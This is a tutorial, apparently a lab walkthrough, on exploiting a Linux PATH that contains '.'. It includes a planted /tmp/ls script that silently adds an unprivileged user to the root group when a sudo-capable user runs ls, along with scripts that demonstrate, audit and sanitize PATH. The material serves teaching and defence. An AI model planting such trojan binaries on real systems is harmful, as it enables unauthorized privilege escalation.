Misconfigured PATH Variable
Introduction
The PATH variable in Linux is a colon-delimited list of directories in which the shell looks for executables. When a user types a bare command name, the shell walks these directories from left to right and runs the first matching executable it finds, so specifying the absolute path is unnecessary.
user@workstation > echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin
In Linux, a single dot (.) denotes the current directory. Any program or script in the current directory can be run by prefixing its name with ./ (e.g., ./script_name). Occasionally, users add the current directory (.) to the PATH variable so that they can run programs or scripts by typing just their names. This is dangerous: whenever such a user runs a command from a directory that other users can write to, an attacker who has planted a file with the same name there gets their own script or binary executed instead. An empty PATH element (a leading or trailing colon, or a double colon) has exactly the same effect as a dot.
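The lookup described above, as an added example that is not part of the original tutorial: resolve_in_path models the left-to-right PATH walk the shell performs, and demo_shadowing builds a scratch directory with a harmless impostor ls (constructed here, nothing runs as root) to show which ls wins under different PATH values. All names are this example's own.

```bash
#!/bin/bash
# Added example (not from the original tutorial): how a bare command name is
# resolved against PATH, and why "." or an empty element in front lets a file
# in the current directory shadow a system binary.

# resolve_in_path NAME PATHSTRING
# Prints the first executable NAME found while walking PATHSTRING left to
# right, which is what the shell (and execvp(3)) does.  Returns 1 if none.
resolve_in_path() {
    local name=$1 rest="$2:" dir
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        # An empty element (leading/trailing ':' or '::') also means the cwd.
        [ -z "$dir" ] && dir=.
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# demo_shadowing: create a scratch directory holding a harmless impostor `ls`
# (constructed for this example), cd into it, and show which `ls` resolves.
demo_shadowing() {
    local work
    work=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho "impostor ls running from %s"\n' "$work" > "$work/ls"
    chmod +x "$work/ls"
    (
        cd "$work" || exit 1
        printf 'PATH=/usr/bin:/bin     -> %s\n' "$(resolve_in_path ls "/usr/bin:/bin")"
        printf 'PATH=.:/usr/bin:/bin   -> %s\n' "$(resolve_in_path ls ".:/usr/bin:/bin")"
        printf 'PATH=:/usr/bin:/bin    -> %s\n' "$(resolve_in_path ls ":/usr/bin:/bin")"
        printf 'PATH=/usr/bin:/bin:.   -> %s\n' "$(resolve_in_path ls "/usr/bin:/bin:.")"
        # Ask bash itself the same question to confirm the model matches.
        printf 'bash with PATH=.:/usr/bin:/bin resolves ls to: %s\n' \
            "$(hash -r; PATH=.:/usr/bin:/bin command -v ls)"
    )
    rm -rf "$work"
}

demo_shadowing
```

With the dot first, the impostor ./ls wins over /usr/bin/ls; with the dot last, an existing command still resolves to the system binary, but any name that does not exist in the system directories (a mistyped command, for instance) still falls through to the current directory, which is why the fix is to remove the dot rather than move it.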
Step-by-Step Guide
Setup
1. Create a user that is not a member of the sudo group
user@user-vm:~$ sudo adduser notroot
2. Add . to PATH variable
The privileged (sudo-capable) user adds . to the front of PATH:
user@user-vm:/tmp$ PATH=.:${PATH}
user@user-vm:/tmp$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin
The vulnerability lies in having . in the PATH variable at all. Placing it first, as above, makes it worse: the current directory is searched before every system directory, so a file named after any command wins the lookup.
Exploitation
Our aim is to add the unprivileged user notroot to the root group.
1. Switch to or log in as notroot
notroot@user-vm:~$
notroot@user-vm:/tmp$ groups
notroot
notroot@user-vm:/tmp$ id
uid=1004(notroot) gid=1004(notroot) groups=1004(notroot)
The above shows that notroot does not belong to the root group.
2. Create the malicious ls script
For this instance we use the ls command: we create a script named ls in a directory that notroot can write to and where the privileged user is likely to run ls (e.g. /tmp/).
notroot@user-vm:~$ touch /tmp/ls && chmod +x /tmp/ls
notroot@user-vm:/tmp$ nano ls
Contents of /tmp/ls:
#!/bin/sh
# Add notroot to the root group, then run the real ls, passing through any
# arguments (e.g. "ls -la") so the victim sees a normal listing.
sudo usermod -aG root notroot && /bin/ls "$@"
For above, we’ve added the command to add notroot user as part of root group, then calling the ls command.
3. Result
Once the privileged user runs the ls command in /tmp, the shell finds ./ls first and executes the malicious script instead of /bin/ls.
user@user-vm:/tmp$ ls
ls
snap-private-tmp
systemd-private-fdd3c09502864376bf27fe67c10253cf-bluetooth.service-CCvwoL
VMwareDnD
vmware-root_571-4248287365
The listing still appears because the script runs /bin/ls at the end, but the malicious command adding notroot to the root group has been executed as well. Note that the planted script itself shows up in the listing as ls, a detail an attentive user might notice.
Checking the privilege and group of notroot:
notroot@user-vm:/home/user$ groups
notroot root
notroot@user-vm:/home/user$ id
uid=1004(notroot) gid=1004(notroot) groups=1004(notroot),0(root)
The above shows that notroot has been added to the root group by the privileged user's execution of ls. Group membership is read at login, so notroot has to start a new session (or use newgrp) before the new group takes effect.
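The check a practitioner would run after reading the above, as an added example that is not part of the original tutorial: audit_path reports every PATH element that lets an attacker plant a lookalike binary (the dot and empty elements, relative entries, and world-writable directories such as /tmp), and sanitize_path builds the corrected PATH, which is the actual fix for the setup step above. The function names and the demonstration PATH value are this example's own.

```bash
#!/bin/bash
# Added example (not part of the original tutorial): audit a PATH value for
# the misconfiguration exploited above and produce a sanitized replacement.

# audit_path PATHSTRING
# Prints one finding per line and returns 1 if anything dangerous was found:
#   - "." or an empty element (leading/trailing ':' or '::'), both meaning
#     the current directory, which is where the planted ls lived;
#   - a relative element, which is also resolved against the current directory;
#   - a world-writable directory, where anyone can drop a lookalike binary.
audit_path() {
    local rest="$1:" dir found=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        if [ -z "$dir" ] || [ "$dir" = . ]; then
            echo "current-directory entry: '$dir'"
            found=1
        elif [ "${dir#/}" = "$dir" ]; then
            echo "relative entry: $dir"
            found=1
        elif [ -d "$dir" ] && [ -n "$(find -H "$dir" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
            echo "world-writable directory: $dir"
            found=1
        fi
    done
    return "$found"
}

# sanitize_path PATHSTRING
# Keeps only absolute entries, dropping "." / empty / relative ones and
# duplicates, and prints the result.  Apply with: export PATH=$(sanitize_path "$PATH")
sanitize_path() {
    local rest="$1:" dir out=
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        rest=${rest#*:}
        case "$dir" in ""|.|[!/]*) continue ;; esac
        case ":$out:" in *":$dir:"*) continue ;; esac
        out="${out:+$out:}$dir"
    done
    printf '%s\n' "$out"
}

# Demonstration on the PATH value produced by the tutorial's Setup step
# (constructed input; which directories are world-writable depends on the host).
bad_path='.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/snap/bin'
echo "Auditing: $bad_path"
audit_path "$bad_path" || echo "PATH is unsafe; sanitized value: $(sanitize_path "$bad_path")"
```

Running the audit against the real "$PATH" of every interactive user (for example from a login script or a configuration-management check) catches this misconfiguration before anyone plants a file; note that /tmp in PATH is flagged as world-writable even though its sticky bit prevents deletion of other users' files, because creating a new file there is all the attacker needs.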
Video Demonstration
Reference
https://materials.rangeforce.com/tutorial/2019/12/25/Misconfigured-PATH/
